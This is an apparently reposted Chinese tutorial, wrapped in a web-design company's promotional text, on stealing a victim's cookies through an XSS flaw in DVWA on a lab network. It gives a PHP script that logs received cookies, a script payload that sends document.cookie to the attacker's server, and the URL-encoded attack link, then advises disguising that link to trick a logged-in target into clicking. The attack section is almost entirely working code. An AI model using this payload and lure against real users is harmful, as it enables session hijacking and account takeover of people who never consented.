這篇文章主要講解了“如何利用XSS漏洞獲取對(duì)方cookie”，文中的講解內(nèi)容簡(jiǎn)單清晰，易于學(xué)習(xí)與理解，下面請(qǐng)大家跟著小編的思路慢慢深入，一起來(lái)研究和學(xué)習(xí)“如何利用XSS漏洞獲取對(duì)方cookie”吧！

主要從事網(wǎng)頁(yè)設(shè)計(jì)、PC網(wǎng)站建設(shè)（電腦版網(wǎng)站建設(shè)）、wap網(wǎng)站建設(shè)（手機(jī)版網(wǎng)站建設(shè)）、成都響應(yīng)式網(wǎng)站建設(shè)公司、程序開(kāi)發(fā)、微網(wǎng)站、微信小程序開(kāi)發(fā)等，憑借多年來(lái)在互聯(lián)網(wǎng)的打拼，我們?cè)诨ヂ?lián)網(wǎng)網(wǎng)站建設(shè)行業(yè)積累了豐富的網(wǎng)站建設(shè)、成都網(wǎng)站建設(shè)、網(wǎng)絡(luò)營(yíng)銷(xiāo)經(jīng)驗(yàn)，集策劃、開(kāi)發(fā)、設(shè)計(jì)、營(yíng)銷(xiāo)、管理等多方位專(zhuān)業(yè)化運(yùn)作于一體，具備承接不同規(guī)模與類(lèi)型的建設(shè)項(xiàng)目的能力。

（1）環(huán)境搭建

kali linux：192.168.80.136

目標(biāo)win7: 192.168.80.130

Metasploitable：192.168.80.129

cookie接收腳本get.php（腳本在/var/www/html文件夾下，html文件夾權(quán)限777）：

<?php
$ck =$_GET['cookie'];
error_log("$ck\n",3,"cookie.txt");
?>

       （2）XSS漏洞利用

       目標(biāo)登錄metasploitable的DVWA，點(diǎn)擊存在XSS漏洞的頁(yè)面，輸入如下代碼后提交：<script>newImage().src="http://192.168.80.136/get.php?cookie="+document.cookie;</script>

（3）查看cookie

       切換到kali，直接查看cookie.txt內(nèi)容，可以看到獲得的cookie。

（4）進(jìn)一步利用

       目標(biāo)提交后可以在地址欄看到如下URL：

http://192.168.80.129/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Enew+Image%28%29.src%3D%22http%3A%2F%2F192.168.80.136%2Fget.php%3Fcookie%3D%22%2Bdocument.cookie%3B%3C%2Fscript%3E#

       可以將以上URL偽裝成其他形式（如圖片），誘使目標(biāo)點(diǎn)擊，在目標(biāo)已登錄的情況下，可以達(dá)到同樣獲取cookie的效果。

感謝各位的閱讀，以上就是“如何利用XSS漏洞獲取對(duì)方cookie”的內(nèi)容了，經(jīng)過(guò)本文的學(xué)習(xí)后，相信大家對(duì)如何利用XSS漏洞獲取對(duì)方cookie這一問(wèn)題有了更深刻的體會(huì)，具體使用情況還需要大家實(shí)踐驗(yàn)證。這里是創(chuàng)新互聯(lián)，小編將為大家推送更多相關(guān)知識(shí)點(diǎn)的文章，歡迎關(guān)注！

分享文章：如何利用XSS漏洞獲取對(duì)方cookie
當(dāng)前路徑：http://chinadenli.net/article20/giodco.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供動(dòng)態(tài)網(wǎng)站、用戶(hù)體驗(yàn)、ChatGPT、網(wǎng)站策劃、軟件開(kāi)發(fā)、網(wǎng)頁(yè)設(shè)計(jì)公司

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶(hù)投稿、用戶(hù)轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來(lái)源： 創(chuàng)新互聯(lián)